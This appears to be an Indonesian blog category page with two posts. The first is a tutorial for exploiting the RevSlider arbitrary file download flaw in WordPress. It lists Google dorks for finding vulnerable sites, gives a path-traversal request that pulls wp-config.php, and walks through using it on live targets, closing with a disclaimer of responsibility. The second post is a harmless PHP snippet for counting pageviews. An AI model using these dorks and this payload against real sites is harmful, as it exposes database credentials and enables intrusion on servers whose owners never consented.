Kategori: wordpress

Exploit WordPress Revslider Arbritary File Download Vulnerability

Naufal Ardhani – Halo sobat kali ini saya akan membahas Exploit WordPress Revslider Arbritary File Download pada exploit ini anda dapat mendownload file file penting yang ada di dalam server web tersebut khususnya web yang menggunakan cms WordPress tapi tidak semua web yang menggunakan cms tersebut rentan dengan exploit ini.

Menurut hasil yang saya dapatkan dari Exploit DB exploit ini ditemukan oleh Claudio Viviani pada tahun 2014, ia merupakan pemilik blog https://www.homelab.it/ yang berisi tentang security.

Dork :

  • inurl:wp-content/plugins/revslider/
  • inurl:revslider
  • inurl:revslider_admin.php
  • inurl:revslider_front.php
  • inurl:plugins/revslider/
  • intext:Powered by Revslider
  • intitle:”Index Of/ revslider”
  • intitle:”Index Of/wp-content/themes/revslider”
  • intitle:”Index Of/wp-content/plugins/revslider”
  • intitle:”Index Of/admin/revslider”
  • intitle:”Index Of/fr/revslider”
  • intitle:”Index Of/en/revslider”
  • intitle:”Index Of/us/revslider”
  • intitle:”Index Of/ar/revslider”
  • intitle:”Index Of/es/revslider”
  • intitle:”Index Of/de/revslider”
Exploit :
  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Step :
  1. Dorking dengan dork yang sudah disediakan.
  2. Disini saya sudah memiliki target yang vuln/rentan tinggal kasih exploit, contoh : http://site.co.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  3. Dan jika berhasil admin-ajax.php terdownload lalu buka dengan text editor.
Sekian saja Exploit WordPress Revslider Arbitary File Download Vulnerability yang saya bagikan semoga bermanfaat dan saya tidak bertanggung atas apa yang anda lakukan terimakasih.

Cara menampilkan total pageviews (halaman dilihat) pada wordpress

Hai sob lama tak jumpa di dunia perbloggeran yachhh, hehehe. kali ini saya akan memberikan tepatknya mau sharing mengenai cara memasang atau menampilkan jumlah total pageview atau jumlah halaman posting dibaca pada blog yang menggunakan engine wordpress.. loh kok ga biasanya yach.. kalo biasanya memposting artikel tentang blogger blogspot tapi kali ini beda dari biasanya.. hehehehe.. Oke memang awalnya saat saya membuat blog tutorial ini khusus membahas tentang blogger blogspot, tapi itu dulu.. karena waktu itu pas kebetulan yang saya tau mengenai blogger blogspot tepatnya menggunakan bahasa pemrogaman html. Dan setelah dipikir-pikir ga ada salahnya kalo mengembangkan ide ke tutorial wordpress hehehe…

Oke gak lama lama lagi akan aku berikan script berbasis PHP yang akan digunakan untuk mengesekusi dan menampilkan pages view count.. Nih dia scriptnya :

<?php // function to count views. function setPostViews($postID) { $count_key = ‘post_views_count’; $count = get_post_meta($postID, $count_key, true); if($count==”){ $count = 0; delete_post_meta($postID, $count_key); add_post_meta($postID, $count_key, ‘0’); }else{ $count++; update_post_meta($postID, $count_key, $count); } } // function to display number of posts. function getPostViews($postID){ $count_key = ‘post_views_count’; $count = get_post_meta($postID, $count_key, true); if($count==”){ delete_post_meta($postID, $count_key); add_post_meta($postID, $count_key, ‘0’); return “0 View”; } return ‘Dilihat ‘.$count.’ kali’; } // Add it to a column in WP-Admin add_filter(‘manage_posts_columns’, ‘posts_column_views’); add_action(‘manage_posts_custom_column’, ‘posts_custom_column_views’,5,2); function posts_column_views($defaults){ $defaults[‘post_views’] = __(‘Views’); return $defaults; } function posts_custom_column_views($column_name, $id){ if($column_name === ‘post_views’){ echo getPostViews(get_the_ID()); } } ?>

Copy dan taruh kode scrip PHP diatas pada file function.php pada blog engine wordpress anda, kemudian simpan.. Selanjutnya anda copy kode script PHP dibawah ini kemudian letakkan atau tepatnya paste didalam file single.php pada blog anda

<?php echo getPostViews(get_the_ID()); ?><?php setPostViews(get_the_ID()); ?>

Untuk penempatan atau tata letak terserah anda.. Semoga membantu yach bagi yang newbie, seperti saya ini.. Jangan lupa kalau ada masalah atau kebingungan anda bisa menanyakan dan meninggalkan pesan dibawah ini, sebisa mungkin akan saya bantu semampu saya.. gud lakkkk..